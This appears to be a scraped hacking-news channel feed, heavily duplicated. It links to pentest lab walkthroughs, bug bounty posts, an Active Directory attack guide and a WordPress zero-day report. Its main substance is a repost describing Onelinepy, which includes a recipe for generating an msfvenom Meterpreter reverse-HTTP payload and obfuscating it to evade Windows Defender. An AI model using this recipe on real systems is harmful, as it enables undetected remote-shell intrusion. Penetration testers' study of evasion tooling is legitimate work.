Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
PG — Photographer — Walkthrough (Offensive Security Proving Grounds Play Boxes)
https://cdn-images-1.medium.com/max/704/1*AcKgLEScu9Es1T7Sq3oSdg.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
PG — Photographer — Walkthrough (Offensive Security Proving Grounds Play Boxes)
https://cdn-images-1.medium.com/max/704/1*AcKgLEScu9Es1T7Sq3oSdg.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PG — Photographer — Walkthrough (Offensive Security Proving Grounds Play Boxes)
This article aims to walk you through Photographer box, produced by v1n1v131r4 and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
THE ART OF ACTIVE SNIFFING
https://cdn-images-1.medium.com/max/2600/0*1snF9EMGOnC-jTx2
In the world of networking, sniffing is a process of monitoring and capturing all the packets flowing through a network.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
THE ART OF ACTIVE SNIFFING
https://cdn-images-1.medium.com/max/2600/0*1snF9EMGOnC-jTx2
In the world of networking, sniffing is a process of monitoring and capturing all the packets flowing through a network.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
THE ART OF ACTIVE SNIFFING
In the world of networking, sniffing is a process of monitoring and capturing all the packets flowing through a network.
My Easiest Critical Bug
https://medium.com/techiepedia/my-easiest-critical-bug-81c341a0d6d4?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/techiepedia/my-easiest-critical-bug-81c341a0d6d4?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
My Easiest Critical Bug
Hello everyone,
Hello everyone,Continue reading on Techiepedia » (https://medium.com/techiepedia/my-easiest-critical-bug-81c341a0d6d4?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
My Easiest Critical Bug
Hello everyone,
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Hacker forum contest gives $100K for new ways to steal digital assets
https://external-preview.redd.it/K81xd2186lWhDtIldpAI96kpMVSDYMqlpPiFNzWiVHQ.jpg?width=640&crop=smart&auto=webp&s=15c87a31aae55cd70bfbd2407e3b9aaf4f7777dd submitted by /u/DrinkMoreCodeMore
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacker forum contest gives $100K for new ways to steal digital assets
https://external-preview.redd.it/K81xd2186lWhDtIldpAI96kpMVSDYMqlpPiFNzWiVHQ.jpg?width=640&crop=smart&auto=webp&s=15c87a31aae55cd70bfbd2407e3b9aaf4f7777dd submitted by /u/DrinkMoreCodeMore
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hacker forum contest gives $100K for new ways to steal digital assets
Posted in r/hacking by u/DrinkMoreCodeMore • 1 point and 0 comments
Attacking Active Directory: 0 to 0.9
https://www.reddit.com/r/redteamsec/comments/nqvhxm/attacking_active_directory_0_to_09/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://zer1t0.gitlab.io/posts/attacking_ad/) [comments] (https://www.reddit.com/r/redteamsec/comments/nqvhxm/attacking_active_directory_0_to_09/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/nqvhxm/attacking_active_directory_0_to_09/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://zer1t0.gitlab.io/posts/attacking_ad/) [comments] (https://www.reddit.com/r/redteamsec/comments/nqvhxm/attacking_active_directory_0_to_09/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Attacking Active Directory: 0 to 0.9
Posted in r/redteamsec by u/dmchell • 6 points and 0 comments
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
http://www.kitploit.com/2021/06/onelinepy-python-obfuscator-to-generate.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/06/onelinepy-python-obfuscator-to-generate.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
Python Obfuscator To Generate One-Liners And FUD Payloads.
Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy
Usage Guide
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]
optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.
Example: Creating FUD Meterpreter (https://www.kitploit.com/search/label/Meterpreter) Python Payload
Generate Python Payload: msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt Obfustucate Payload onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt Profit! The Obfustucated Payload (https://www.kitploit.com/search/label/Payload) works against Windows (https://www.kitploit.com/search/label/Windows) Defender.
More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3 onelinepy -m /one_line/hex --code "print('HEX!')"
Obfustucation Method List
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden
Download Onelinepy (https://github.com/spicesouls/onelinepy)
___________________________
@hacking_Attack
@Hacking_Video
Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy
Usage Guide
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]
optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.
Example: Creating FUD Meterpreter (https://www.kitploit.com/search/label/Meterpreter) Python Payload
Generate Python Payload: msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt Obfustucate Payload onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt Profit! The Obfustucated Payload (https://www.kitploit.com/search/label/Payload) works against Windows (https://www.kitploit.com/search/label/Windows) Defender.
More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3 onelinepy -m /one_line/hex --code "print('HEX!')"
Obfustucation Method List
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden
Download Onelinepy (https://github.com/spicesouls/onelinepy)
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - spicesouls/onelinepy: Python Obfuscator to generate One-Liners and FUD Payloads.
Python Obfuscator to generate One-Liners and FUD Payloads. - spicesouls/onelinepy
Admin Panel? Pwned!
https://splint3rsec.medium.com/admin-panel-pwned-89db333f3836?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://splint3rsec.medium.com/admin-panel-pwned-89db333f3836?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Admin Panel? Pwned!
The unstoppable power of recon
The unstoppable power of reconContinue reading on Medium » (https://splint3rsec.medium.com/admin-panel-pwned-89db333f3836?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Admin Panel? Pwned!
The unstoppable power of recon
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Critical Zero-Day Discovered in Fancy Product Designer WordPress Plug-in
The plug-in under active attack has been installed on more than 17,000 websites, say researchers.
___________________________
@hacking_Attack
@Hacking_Video
Critical Zero-Day Discovered in Fancy Product Designer WordPress Plug-in
The plug-in under active attack has been installed on more than 17,000 websites, say researchers.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Critical Zero-Day Discovered in Fancy Product Designer WordPress Plug-in
The plug-in under active attack has been installed on more than 17,000 websites, say researchers.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
https://cdn-images-1.medium.com/max/600/1*CpRci7aZzS9dwIF5_iONMw.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
https://cdn-images-1.medium.com/max/600/1*CpRci7aZzS9dwIF5_iONMw.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
This article aims to walk you through InfoSecPrep box, produced by FalconSpy and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving…